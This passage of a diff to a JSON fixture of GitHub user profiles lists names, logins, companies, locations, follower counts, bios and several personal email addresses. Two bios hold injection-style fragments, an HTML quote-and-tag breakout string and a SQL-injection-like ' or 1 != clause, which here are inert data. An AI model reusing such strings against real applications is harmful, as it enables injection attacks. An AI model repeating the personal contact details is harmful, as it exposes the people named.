341, + "public_gists_count": 2, + "public_repositories_count": 14, + "created_at": "2012-01-09T02:17:20Z", + "updated_at": "2024-09-09T12:38:38Z", + "node_id": "MDQ6VXNlcjEzMTM5ODQ=", + "bio": "voip/webapp/network penetration testing & information security behind @EnableSecurity ; mostly harmless \r\n\"'>", - "collaborators_count": 0, - "following_count": 66, - "followers_count": 47, - "public_gists_count": 13, - "public_repositories_count": 59, - "created_at": "2011-07-28T05:23:45Z", - "updated_at": "2024-07-29T21:33:00Z", - "node_id": "MDQ6VXNlcjk0MzY0MQ==", - "bio": "ike ' or 1 != \" is a software developer and application security specialist with experience leading, planning, and implementing migrations of legacy codebases", - "is_hireable": false, - "twitter_username": "ki11ick" + "twitter_username": "" } }, { "model": "github.user", - "pk": 797, + "pk": 6033, "fields": { - "nest_created_at": "2024-09-11T21:38:33.234Z", - "nest_updated_at": "2024-09-11T21:38:33.234Z", - "name": "Josh", - "login": "josh-hemphill", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46608115?v=4", - "company": "USA", - "location": "Washington", + "nest_created_at": "2024-09-22T06:43:44.766Z", + "nest_updated_at": "2024-09-22T18:30:20.270Z", + "name": "Malte Heinzelmann", + "login": "hnzlmnn", + "email": "malte@hnzlmnn.de", + "avatar_url": "https://avatars.githubusercontent.com/u/1322788?v=4", + "company": "ERNW GmbH", + "location": "Germany", "collaborators_count": 0, - "following_count": 6, + "following_count": 9, "followers_count": 12, - "public_gists_count": 11, - "public_repositories_count": 84, - "created_at": "2019-01-11T18:51:56Z", - "updated_at": "2024-08-25T11:45:16Z", - "node_id": "MDQ6VXNlcjQ2NjA4MTE1", - "bio": "Full Stack developer and hobbyist\r\nLove Javascript and the JS ecosystem", - "is_hireable": true, - "twitter_username": "spooklogical" - } -}, -{ - "model": "github.user", - "pk": 798, - "fields": { - "nest_created_at": "2024-09-11T21:38:37.785Z", - "nest_updated_at": "2024-09-11T21:38:37.785Z", - "name": "Yonah Russ", - "login": "yruss972", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1858636?v=4", - "company": "Plarium Global", - "location": "Israel", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 4, - "public_repositories_count": 28, - "created_at": "2012-06-17T10:15:02Z", - "updated_at": "2024-09-03T13:43:32Z", - "node_id": "MDQ6VXNlcjE4NTg2MzY=", + "public_gists_count": 3, + "public_repositories_count": 43, + "created_at": "2012-01-11T20:04:20Z", + "updated_at": "2024-09-21T20:33:12Z", + "node_id": "MDQ6VXNlcjEzMjI3ODg=", "bio": "", "is_hireable": false, - "twitter_username": "yruss972" + "twitter_username": "hnzlmnn" } }, { "model": "github.user", - "pk": 799, + "pk": 6034, "fields": { - "nest_created_at": "2024-09-11T21:38:47.927Z", - "nest_updated_at": "2024-09-16T21:05:35.176Z", - "name": "Daniel Cuthbert", - "login": "danielcuthbert", + "nest_created_at": "2024-09-22T06:43:45.082Z", + "nest_updated_at": "2024-09-22T18:30:20.578Z", + "name": "retset", + "login": "ret5et", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7882621?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8653899?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 13, - "followers_count": 107, - "public_gists_count": 1, - "public_repositories_count": 46, - "created_at": "2014-06-13T17:35:17Z", - "updated_at": "2024-09-13T13:27:27Z", - "node_id": "MDQ6VXNlcjc4ODI2MjE=", + "following_count": 15, + "followers_count": 6, + "public_gists_count": 6, + "public_repositories_count": 10, + "created_at": "2014-09-04T09:32:10Z", + "updated_at": "2023-07-08T15:28:42Z", + "node_id": "MDQ6VXNlcjg2NTM4OTk=", "bio": "", "is_hireable": false, - "twitter_username": "dcuthbert" + "twitter_username": "" } }, { "model": "github.user", - "pk": 800, + "pk": 6035, "fields": { - "nest_created_at": "2024-09-11T21:38:53.228Z", - "nest_updated_at": "2024-09-18T19:10:58.590Z", - "name": "Sjoerd Langkemper", - "login": "Sjord", - "email": "sjoerd-github@linuxonly.nl", - "avatar_url": "https://avatars.githubusercontent.com/u/113030?v=4", + "nest_created_at": "2024-09-22T06:43:45.399Z", + "nest_updated_at": "2024-09-22T18:30:20.897Z", + "name": "Mathieu Geli", + "login": "gelim", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/179122?v=4", "company": "", - "location": "Haarlem, The Netherlands", + "location": "", "collaborators_count": 0, - "following_count": 24, - "followers_count": 191, - "public_gists_count": 6, - "public_repositories_count": 167, - "created_at": "2009-08-07T20:12:28Z", - "updated_at": "2024-03-29T08:49:29Z", - "node_id": "MDQ6VXNlcjExMzAzMA==", - "bio": "", + "following_count": 1, + "followers_count": 77, + "public_gists_count": 5, + "public_repositories_count": 34, + "created_at": "2010-01-09T17:23:27Z", + "updated_at": "2024-08-08T15:04:33Z", + "node_id": "MDQ6VXNlcjE3OTEyMg==", + "bio": "Insecurity researcher", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 801, + "pk": 6036, "fields": { - "nest_created_at": "2024-09-11T21:39:04.482Z", - "nest_updated_at": "2024-09-11T21:39:04.867Z", - "name": "", - "login": "mjang-cobalt", + "nest_created_at": "2024-09-22T06:43:45.713Z", + "nest_updated_at": "2024-09-22T18:30:21.217Z", + "name": "gloomicious", + "login": "gloomicious", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84352037?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43707929?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2021-05-17T20:42:10Z", - "updated_at": "2024-08-12T12:24:11Z", - "node_id": "MDQ6VXNlcjg0MzUyMDM3", + "public_repositories_count": 0, + "created_at": "2018-09-29T18:15:01Z", + "updated_at": "2024-09-11T08:22:17Z", + "node_id": "MDQ6VXNlcjQzNzA3OTI5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380278,74 +636827,74 @@ }, { "model": "github.user", - "pk": 802, + "pk": 6037, "fields": { - "nest_created_at": "2024-09-11T21:39:35.103Z", - "nest_updated_at": "2024-09-11T21:39:35.103Z", - "name": "", - "login": "1songb1rd", + "nest_created_at": "2024-09-22T06:43:46.040Z", + "nest_updated_at": "2024-09-22T18:30:21.526Z", + "name": "Scott Walsh", + "login": "invisiblethreat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/102816165?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2525006?v=4", "company": "", - "location": "", + "location": "loopback", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-04-01T15:02:13Z", - "updated_at": "2022-04-01T15:52:14Z", - "node_id": "U_kgDOBiDZpQ", - "bio": "https://www.linkedin.com/in/positiveassurance/", + "following_count": 8, + "followers_count": 45, + "public_gists_count": 3, + "public_repositories_count": 83, + "created_at": "2012-10-10T03:10:09Z", + "updated_at": "2024-09-18T00:24:48Z", + "node_id": "MDQ6VXNlcjI1MjUwMDY=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 803, + "pk": 6038, "fields": { - "nest_created_at": "2024-09-11T21:39:53.570Z", - "nest_updated_at": "2024-09-18T18:21:14.708Z", - "name": "Shanni Prutchi", - "login": "EnigmaRosa", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47675904?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T06:43:46.363Z", + "nest_updated_at": "2024-09-22T18:30:21.839Z", + "name": "Vincent Berg", + "login": "gvb84", + "email": "gvb@santarago.org", + "avatar_url": "https://avatars.githubusercontent.com/u/4733184?v=4", + "company": "Anvil Secure", + "location": "Amsterdam, the Netherlands", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2019-02-15T20:24:13Z", - "updated_at": "2024-09-09T01:29:19Z", - "node_id": "MDQ6VXNlcjQ3Njc1OTA0", - "bio": "", - "is_hireable": false, + "public_repositories_count": 25, + "created_at": "2013-06-18T23:31:36Z", + "updated_at": "2024-09-19T12:02:27Z", + "node_id": "MDQ6VXNlcjQ3MzMxODQ=", + "bio": "That tall guy over there.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 804, + "pk": 6039, "fields": { - "nest_created_at": "2024-09-11T21:40:19.286Z", - "nest_updated_at": "2024-09-11T21:40:19.286Z", - "name": "Arun Sivadasan", - "login": "teavanist", + "nest_created_at": "2024-09-22T06:43:47.006Z", + "nest_updated_at": "2024-09-22T18:30:22.472Z", + "name": "", + "login": "iggy38", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37803648?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/14939540?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 3, - "public_gists_count": 17, - "public_repositories_count": 14, - "created_at": "2018-03-26T13:11:44Z", - "updated_at": "2024-08-27T11:39:49Z", - "node_id": "MDQ6VXNlcjM3ODAzNjQ4", + "following_count": 4, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-10-02T10:59:32Z", + "updated_at": "2024-03-15T08:21:35Z", + "node_id": "MDQ6VXNlcjE0OTM5NTQw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380353,49 +636902,49 @@ }, { "model": "github.user", - "pk": 805, + "pk": 6040, "fields": { - "nest_created_at": "2024-09-11T21:40:23.005Z", - "nest_updated_at": "2024-09-11T21:40:23.005Z", - "name": "Gerrit Padgham", - "login": "weasel0x00", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1728630?v=4", + "nest_created_at": "2024-09-22T06:43:54.329Z", + "nest_updated_at": "2024-09-22T18:30:29.899Z", + "name": "", + "login": "guifre", + "email": "me@guif.re", + "avatar_url": "https://avatars.githubusercontent.com/u/987927?v=4", "company": "", - "location": "", + "location": "Barcelona", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 26, + "followers_count": 200, "public_gists_count": 1, - "public_repositories_count": 4, - "created_at": "2012-05-11T01:42:35Z", - "updated_at": "2023-04-21T13:17:07Z", - "node_id": "MDQ6VXNlcjE3Mjg2MzA=", + "public_repositories_count": 20, + "created_at": "2011-08-18T06:11:15Z", + "updated_at": "2024-09-03T05:11:24Z", + "node_id": "MDQ6VXNlcjk4NzkyNw==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "guifreruiz" } }, { "model": "github.user", - "pk": 806, + "pk": 6041, "fields": { - "nest_created_at": "2024-09-11T21:40:31.974Z", - "nest_updated_at": "2024-09-11T21:40:31.974Z", - "name": "", - "login": "JoergBruenner", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/79036211?v=4", + "nest_created_at": "2024-09-22T06:43:54.648Z", + "nest_updated_at": "2024-09-22T18:32:52.859Z", + "name": "Mac Collins", + "login": "macacollins", + "email": "macacollins@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5402373?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-02-14T06:15:00Z", - "updated_at": "2024-09-05T13:46:07Z", - "node_id": "MDQ6VXNlcjc5MDM2MjEx", + "following_count": 4, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2013-09-06T19:36:43Z", + "updated_at": "2024-09-15T21:49:02Z", + "node_id": "MDQ6VXNlcjU0MDIzNzM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380403,49 +636952,49 @@ }, { "model": "github.user", - "pk": 807, + "pk": 6042, "fields": { - "nest_created_at": "2024-09-11T21:40:57.051Z", - "nest_updated_at": "2024-09-11T21:40:57.051Z", - "name": "", - "login": "leirn", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5393005?v=4", - "company": "", - "location": "Paris, France", + "nest_created_at": "2024-09-22T06:43:58.925Z", + "nest_updated_at": "2024-09-22T18:30:34.460Z", + "name": "Sreenath Sasikumar", + "login": "sreenathsasikumar", + "email": "sreenath.sasikumar@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4394721?v=4", + "company": "MashupStack", + "location": "Trivandrum", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, + "following_count": 0, + "followers_count": 27, "public_gists_count": 0, - "public_repositories_count": 34, - "created_at": "2013-09-05T16:50:59Z", - "updated_at": "2024-08-26T18:11:35Z", - "node_id": "MDQ6VXNlcjUzOTMwMDU=", - "bio": "Mostly harmless", + "public_repositories_count": 5, + "created_at": "2013-05-10T08:31:36Z", + "updated_at": "2024-02-11T06:52:40Z", + "node_id": "MDQ6VXNlcjQzOTQ3MjE=", + "bio": "CEO & Founder - MashupStack", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 808, + "pk": 6043, "fields": { - "nest_created_at": "2024-09-11T21:41:02.502Z", - "nest_updated_at": "2024-09-11T21:41:06.646Z", - "name": "David Deatherage", - "login": "securitydave", + "nest_created_at": "2024-09-22T06:43:59.253Z", + "nest_updated_at": "2024-09-22T19:46:28.057Z", + "name": "SiGhTfOrbACQ", + "login": "SiGhTfOrbACQ", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/112591783?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/126778?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-08-31T23:00:52Z", - "updated_at": "2023-07-09T14:44:15Z", - "node_id": "U_kgDOBrYDpw", + "following_count": 24, + "followers_count": 36, + "public_gists_count": 4, + "public_repositories_count": 99, + "created_at": "2009-09-14T14:31:14Z", + "updated_at": "2021-02-21T18:11:06Z", + "node_id": "MDQ6VXNlcjEyNjc3OA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380453,74 +637002,74 @@ }, { "model": "github.user", - "pk": 809, + "pk": 6044, "fields": { - "nest_created_at": "2024-09-11T21:41:43.472Z", - "nest_updated_at": "2024-09-11T21:41:43.472Z", - "name": "", - "login": "appills", + "nest_created_at": "2024-09-22T06:44:03.120Z", + "nest_updated_at": "2024-09-22T20:25:56.979Z", + "name": "panda bear", + "login": "0xcpu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20586284?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2598963?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2016-07-21T21:03:29Z", - "updated_at": "2024-01-30T17:06:35Z", - "node_id": "MDQ6VXNlcjIwNTg2Mjg0", - "bio": "meh", + "following_count": 87, + "followers_count": 259, + "public_gists_count": 7, + "public_repositories_count": 18, + "created_at": "2012-10-19T12:04:50Z", + "updated_at": "2024-07-14T14:46:33Z", + "node_id": "MDQ6VXNlcjI1OTg5NjM=", + "bio": "nothing interesting", "is_hireable": true, - "twitter_username": "" + "twitter_username": "cpu_ebfe" } }, { "model": "github.user", - "pk": 810, + "pk": 6045, "fields": { - "nest_created_at": "2024-09-11T21:41:51.705Z", - "nest_updated_at": "2024-09-11T21:41:52.099Z", - "name": "BitnessWise", - "login": "bitnesswise", + "nest_created_at": "2024-09-22T06:44:03.475Z", + "nest_updated_at": "2024-09-22T18:30:38.892Z", + "name": "Frenchie", + "login": "frenchi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32780182?v=4", - "company": "BitnessWise", - "location": "The Netherlands", + "avatar_url": "https://avatars.githubusercontent.com/u/1568199?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2017-10-13T19:44:18Z", - "updated_at": "2024-01-02T21:19:38Z", - "node_id": "MDQ6VXNlcjMyNzgwMTgy", - "bio": "", + "following_count": 167, + "followers_count": 67, + "public_gists_count": 8, + "public_repositories_count": 40, + "created_at": "2012-03-23T13:38:14Z", + "updated_at": "2024-08-30T11:57:06Z", + "node_id": "MDQ6VXNlcjE1NjgxOTk=", + "bio": "Security, containers & 🤖 🚘 geek.", "is_hireable": false, - "twitter_username": "BitnessWise" + "twitter_username": "" } }, { "model": "github.user", - "pk": 811, + "pk": 6046, "fields": { - "nest_created_at": "2024-09-11T21:42:23.702Z", - "nest_updated_at": "2024-09-11T21:42:24.096Z", - "name": "", - "login": "craig-shony", + "nest_created_at": "2024-09-22T06:44:03.784Z", + "nest_updated_at": "2024-09-22T18:30:39.206Z", + "name": "Don Lampert", + "login": "donlampert", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/79337339?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7338649?v=4", "company": "", - "location": "", + "location": "Overland Park, KS", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-02-19T21:04:04Z", - "updated_at": "2024-02-07T15:22:12Z", - "node_id": "MDQ6VXNlcjc5MzM3MzM5", + "following_count": 9, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2014-04-18T15:43:53Z", + "updated_at": "2023-08-31T17:13:33Z", + "node_id": "MDQ6VXNlcjczMzg2NDk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380528,124 +637077,124 @@ }, { "model": "github.user", - "pk": 812, + "pk": 6047, "fields": { - "nest_created_at": "2024-09-11T21:42:25.751Z", - "nest_updated_at": "2024-09-11T21:42:25.751Z", - "name": "Ali Ramazan TAŞDELEN", - "login": "alitasdln", + "nest_created_at": "2024-09-22T06:44:04.754Z", + "nest_updated_at": "2024-09-22T18:30:40.191Z", + "name": "", + "login": "jkickens", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/66968278?v=4", - "company": "HIRE ME", - "location": "root@target:~#", + "avatar_url": "https://avatars.githubusercontent.com/u/5155869?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2020-06-15T18:05:45Z", - "updated_at": "2024-08-28T12:45:24Z", - "node_id": "MDQ6VXNlcjY2OTY4Mjc4", - "bio": "Aspiring Application Security Engineer", + "public_repositories_count": 4, + "created_at": "2013-08-03T17:15:00Z", + "updated_at": "2023-07-02T23:40:24Z", + "node_id": "MDQ6VXNlcjUxNTU4Njk=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 813, + "pk": 6048, "fields": { - "nest_created_at": "2024-09-11T21:42:34.850Z", - "nest_updated_at": "2024-09-18T18:21:12.045Z", - "name": "Tobias Ahnoff", - "login": "TobiasAhnoff", - "email": "tobias.ahnoff@omegapoint.se", - "avatar_url": "https://avatars.githubusercontent.com/u/2394007?v=4", - "company": "Omegapoint", - "location": "Sweden", + "nest_created_at": "2024-09-22T06:44:05.064Z", + "nest_updated_at": "2024-09-22T18:30:40.513Z", + "name": "Harry", + "login": "409H", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2313704?v=4", + "company": "", + "location": "United Kingdom", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2012-09-21T14:32:20Z", - "updated_at": "2024-08-05T10:57:32Z", - "node_id": "MDQ6VXNlcjIzOTQwMDc=", + "following_count": 18, + "followers_count": 334, + "public_gists_count": 19, + "public_repositories_count": 67, + "created_at": "2012-09-09T23:35:58Z", + "updated_at": "2024-09-19T15:53:11Z", + "node_id": "MDQ6VXNlcjIzMTM3MDQ=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "sniko_" } }, { "model": "github.user", - "pk": 814, + "pk": 6049, "fields": { - "nest_created_at": "2024-09-11T21:42:47.080Z", - "nest_updated_at": "2024-09-11T21:42:47.487Z", - "name": "Riccardo Sirigu", - "login": "ricsirigu", + "nest_created_at": "2024-09-22T06:44:05.744Z", + "nest_updated_at": "2024-09-22T18:30:41.162Z", + "name": "Viral Maniar", + "login": "Viralmaniar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5004093?v=4", - "company": "Abissi", - "location": "Sardinia, IT", + "avatar_url": "https://avatars.githubusercontent.com/u/3501170?v=4", + "company": "Preemptive Cyber Security Pty Ltd", + "location": "Melbourne, Victoria, Australia", "collaborators_count": 0, - "following_count": 209, - "followers_count": 33, - "public_gists_count": 19, - "public_repositories_count": 70, - "created_at": "2013-07-13T19:30:39Z", - "updated_at": "2024-09-11T07:38:23Z", - "node_id": "MDQ6VXNlcjUwMDQwOTM=", - "bio": "CISSP, Head Of Application Security", + "following_count": 85, + "followers_count": 795, + "public_gists_count": 21, + "public_repositories_count": 51, + "created_at": "2013-02-07T12:22:09Z", + "updated_at": "2023-12-21T02:04:29Z", + "node_id": "MDQ6VXNlcjM1MDExNzA=", + "bio": "", "is_hireable": false, - "twitter_username": "ricsirigu" + "twitter_username": "maniarviral" } }, { "model": "github.user", - "pk": 815, + "pk": 6050, "fields": { - "nest_created_at": "2024-09-11T21:43:12.184Z", - "nest_updated_at": "2024-09-18T18:21:02.329Z", - "name": "Jordan Sherman", - "login": "deleterepo", + "nest_created_at": "2024-09-22T06:44:06.388Z", + "nest_updated_at": "2024-09-22T18:30:41.783Z", + "name": "Angelo Maragna", + "login": "angelomaragna", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10911975?v=4", - "company": "Forward Security ", - "location": "Toronto", + "avatar_url": "https://avatars.githubusercontent.com/u/6837687?v=4", + "company": "NG Italy", + "location": "Verona (Italy)", "collaborators_count": 0, - "following_count": 3, - "followers_count": 3, - "public_gists_count": 5, - "public_repositories_count": 52, - "created_at": "2015-02-08T19:13:39Z", - "updated_at": "2024-08-05T17:21:12Z", - "node_id": "MDQ6VXNlcjEwOTExOTc1", - "bio": "aka @jsherm-fwdsec", + "following_count": 1, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 28, + "created_at": "2014-03-03T08:53:28Z", + "updated_at": "2024-08-21T15:02:23Z", + "node_id": "MDQ6VXNlcjY4Mzc2ODc=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 816, + "pk": 6051, "fields": { - "nest_created_at": "2024-09-11T22:08:42.117Z", - "nest_updated_at": "2024-09-11T22:08:42.117Z", + "nest_created_at": "2024-09-22T06:44:07.050Z", + "nest_updated_at": "2024-09-22T18:30:42.492Z", "name": "", - "login": "fluentsharp", + "login": "batiste93", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7695278?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1128614?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 22, - "created_at": "2014-05-25T15:50:05Z", - "updated_at": "2016-05-29T11:24:28Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjc2OTUyNzg=", + "public_repositories_count": 5, + "created_at": "2011-10-14T16:30:00Z", + "updated_at": "2022-07-10T03:40:02Z", + "node_id": "MDQ6VXNlcjExMjg2MTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380653,74 +637202,49 @@ }, { "model": "github.user", - "pk": 817, + "pk": 6052, "fields": { - "nest_created_at": "2024-09-11T22:08:47.436Z", - "nest_updated_at": "2024-09-18T18:21:40.918Z", - "name": "", - "login": "ebranca", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/866040?v=4", + "nest_created_at": "2024-09-22T06:44:07.383Z", + "nest_updated_at": "2024-09-22T18:30:42.823Z", + "name": "Yagiz Erkan", + "login": "yagizerkan", + "email": "yagizerkan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3461929?v=4", "company": "", - "location": "", + "location": "Boulder, CO", "collaborators_count": 0, - "following_count": 0, - "followers_count": 20, + "following_count": 2, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2011-06-22T05:38:01Z", - "updated_at": "2020-06-04T17:06:33Z", - "node_id": "MDQ6VXNlcjg2NjA0MA==", - "bio": "", + "public_repositories_count": 7, + "created_at": "2013-02-03T07:32:04Z", + "updated_at": "2024-09-04T19:22:45Z", + "node_id": "MDQ6VXNlcjM0NjE5Mjk=", + "bio": "Engineering Leader. Product Creator. Team Builder. Cat herder. Mountain mover. Avid reader. YouTuber. Blogger. Coach. Mentor. Beekeeper.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 818, - "fields": { - "nest_created_at": "2024-09-11T22:09:09.802Z", - "nest_updated_at": "2024-09-11T22:09:29.164Z", - "name": "Martin Gallo", - "login": "martingalloar", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3941628?v=4", - "company": "@hyprcorp", - "location": "Sur", - "collaborators_count": 0, - "following_count": 86, - "followers_count": 357, - "public_gists_count": 1, - "public_repositories_count": 18, - "created_at": "2013-03-22T13:53:25Z", - "updated_at": "2024-09-04T20:49:32Z", - "node_id": "MDQ6VXNlcjM5NDE2Mjg=", - "bio": "InfoSec Leader/Innovation | 👨🏾‍💻PdM @HYPRCorp | 🙆Co-org @TandilSec | 🧐CFP @EkoParty | ✊Knowledge sharing and community building | 🏀#12 | 🗨️Words are mine", - "is_hireable": false, - "twitter_username": "martingalloar" - } -}, -{ - "model": "github.user", - "pk": 819, + "pk": 6053, "fields": { - "nest_created_at": "2024-09-11T22:09:14.027Z", - "nest_updated_at": "2024-09-18T18:21:48.388Z", - "name": "", - "login": "codeHorse87", + "nest_created_at": "2024-09-22T06:44:07.698Z", + "nest_updated_at": "2024-09-22T18:30:43.135Z", + "name": "Abimbola Idowu", + "login": "hisabimbola", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10906772?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9654923?v=4", "company": "", - "location": "", + "location": "Lagos, Nigeria", "collaborators_count": 0, - "following_count": 20, - "followers_count": 6, - "public_gists_count": 1, - "public_repositories_count": 10, - "created_at": "2015-02-08T09:46:53Z", - "updated_at": "2024-06-04T13:10:13Z", - "node_id": "MDQ6VXNlcjEwOTA2Nzcy", + "following_count": 11, + "followers_count": 40, + "public_gists_count": 8, + "public_repositories_count": 64, + "created_at": "2014-11-10T10:22:23Z", + "updated_at": "2024-09-06T04:57:27Z", + "node_id": "MDQ6VXNlcjk2NTQ5MjM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380728,49 +637252,49 @@ }, { "model": "github.user", - "pk": 820, + "pk": 6054, "fields": { - "nest_created_at": "2024-09-11T22:09:47.962Z", - "nest_updated_at": "2024-09-11T22:12:51.182Z", - "name": "Mark Denihan", - "login": "markdenihan", - "email": "mark.denihan@owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/3484318?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T06:44:08.027Z", + "nest_updated_at": "2024-09-22T18:30:43.454Z", + "name": "Brad Dunn", + "login": "bdunn313", + "email": "brad@braddunn.com", + "avatar_url": "https://avatars.githubusercontent.com/u/867683?v=4", + "company": "@datastax", + "location": "Detroit, MI", "collaborators_count": 0, - "following_count": 7, - "followers_count": 106, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-02-05T18:20:52Z", - "updated_at": "2022-07-15T15:12:39Z", - "node_id": "MDQ6VXNlcjM0ODQzMTg=", + "following_count": 46, + "followers_count": 25, + "public_gists_count": 18, + "public_repositories_count": 71, + "created_at": "2011-06-22T17:52:54Z", + "updated_at": "2024-07-28T14:11:11Z", + "node_id": "MDQ6VXNlcjg2NzY4Mw==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 821, + "pk": 6055, "fields": { - "nest_created_at": "2024-09-11T22:09:49.261Z", - "nest_updated_at": "2024-09-11T22:11:41.849Z", - "name": "Seán", - "login": "SeanDuggan", + "nest_created_at": "2024-09-22T06:44:08.352Z", + "nest_updated_at": "2024-09-22T18:30:43.765Z", + "name": "Pablo Ley", + "login": "PabloL007", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2421968?v=4", - "company": "Lexis Nexis", - "location": "Dublin", + "avatar_url": "https://avatars.githubusercontent.com/u/16760540?v=4", + "company": "Miro", + "location": "", "collaborators_count": 0, - "following_count": 65, - "followers_count": 99, + "following_count": 4, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2012-09-25T17:35:50Z", - "updated_at": "2024-08-29T15:03:33Z", - "node_id": "MDQ6VXNlcjI0MjE5Njg=", + "public_repositories_count": 5, + "created_at": "2016-01-18T14:18:19Z", + "updated_at": "2024-06-04T10:44:58Z", + "node_id": "MDQ6VXNlcjE2NzYwNTQw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -380778,24 +637302,24 @@ }, { "model": "github.user", - "pk": 822, + "pk": 6056, "fields": { - "nest_created_at": "2024-09-11T22:10:14.500Z", - "nest_updated_at": "2024-09-11T22:10:14.501Z", - "name": "Aidan Knowles", - "login": "aidanknowles", + "nest_created_at": "2024-09-22T06:44:08.679Z", + "nest_updated_at": "2024-09-22T18:30:44.071Z", + "name": "", + "login": "seanewest", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6151063?v=4", - "company": "IBM", - "location": "Dublin, Ireland", + "avatar_url": "https://avatars.githubusercontent.com/u/3216121?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 9, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-12-10T11:11:25Z", - "updated_at": 